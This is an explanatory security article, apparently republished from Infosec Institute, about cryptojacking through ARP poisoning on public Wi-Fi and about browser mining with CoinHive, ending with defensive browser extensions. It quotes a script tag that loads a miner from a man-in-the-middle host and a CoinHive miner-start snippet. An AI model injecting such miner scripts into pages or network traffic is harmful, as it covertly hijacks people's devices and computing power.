Article initially published in: Infosec Institute by Pedro Tavares
The Cyber attacker is leveraging covert and malicious ways to produce digital money — often using Crypto miners. This clever technique is known specifically as “Crypto jacking.”
It is the secret usage of computing processing power to mine cryptocurrency. This can lead to security breaches and can greatly impact the computer resources which are available. For instance, IT systems can freeze, personal data can be lost, and gaps can be created that other Cyber attackers can further exploit.
Crypto jacking via ARP Poisoning
This kind of Cyberattack is done by applying computer processing resources towards solving complex mathematical puzzles (known as the “Challenge”). The more processing power that is used, the more the Cyber attacker can access the cryptocurrency which is collected through mining. Unfortunately, public Wi-Fi networks are used in this mining process as well because they do not make use of any offline monitoring tools.
A perfect example of this is the Starbucks Coffee chain located in Buenos Aires, Argentina. In December 2017, the public Wi-Fi networks at these coffee shops were secretly using visitors’ computers and smartphones to mine cryptocurrency.
Address Resolution Protocol (ARP) Poisoning attacks have been used to manipulate the users’ traffic and make them mine cryptocurrency. This is done by adding a piece of malicious code in the web server requests. In this scenario, the Cyber attacker floods a target ARP cache with forged entries (this is also being also known as “Poisoning”). This technique makes use of Man-in-the-Middle attacks to poison the network.
How it Works
All requested web pages are infected with a snippet of code — this is the malicious Crypto miner. For this to happen, the Cyber attackers’ computer is placed in the middle of the communication line, between the router and the users’ computer. The figure below illustrates how this process works:
In the first stage, spoofed ARP messages are sent to the Wi-Fi network by the Cyber attacker, and as a result of this, the MAC address is identified as the default gateway. Also, all network traffic destined to the Wi-Fi router is now sent in advance to the Cyber attacker — who is also the Man-In-the-Middle.
(source-code) … <script src=”man-in-the-middle-IP/crypto-jacking.js”></script> … (source-code)
Example of a malicious cryptominer embedded in a Wi-Fi request.
The Cyber attacker can use a Crypto miner that runs on a local computer as well as other online APIs such as and to mine the Cryptocurrency.
The Monero Cryptocurrency has gained a new role in Crypto jacking. It was officially launched in 2014, and it is designed to be used covertly on individual computers. For this to happen, the Monero mining tools have been recently put into circulation. They can be easily added to websites and fed through unsuspecting computers to execute the Cryptomining activities.
A snippet of code from CoinHive is illustrated below:
<script> var miner = new CRLT.Anonymous(‘YOUR_SITE_PUBLIC_KEY’); miner.start(); </script>
Identifying and mitigating the risks of Crypto jacking is a very cumbersome and tedious task. Because public Wi-Fi networks are not being monitored in real time, they have become the prime venue for the Cyber attacker in which to trigger such events.
With Cybercrime on the rise, Crypto jacking has evolved into the latest threat landscape allowing hackers to obtain money in a very covert and easy way. As a result, it is difficult to fight against this kind of malicious activity.
To combat this threat, an end user can install various web-browser extensions that block in-browsing Cryptomining attacks. An example of this is No Coin, a Chrome extension developed by Rafael Keramidas. It blocks CoinHive mining and also adds an extra layer of protection against other forms of Crypto jacking.
Pedro Tavares is a professional in the field of information security working as an Ethical Hacker/Pentester, Malware Researcher and also a Security Evangelist. He is also a founding member at CSIRT.UBI and Editor-in-Chief of the security computer blog seguranca-informatica.pt.
In recent years he has invested in the field of information security, exploring and analyzing a wide range of topics, such as pentesting (Kali Linux), malware, exploitation, hacking, IoT and security in Active Directory networks. He is also Freelance Writer (Infosec. Resources Institute and Cyber Defense Magazine) and developer of the 0xSI_f33d – a feed that compiles phishing and malware campaigns targeting Portuguese citizens.
Read more here.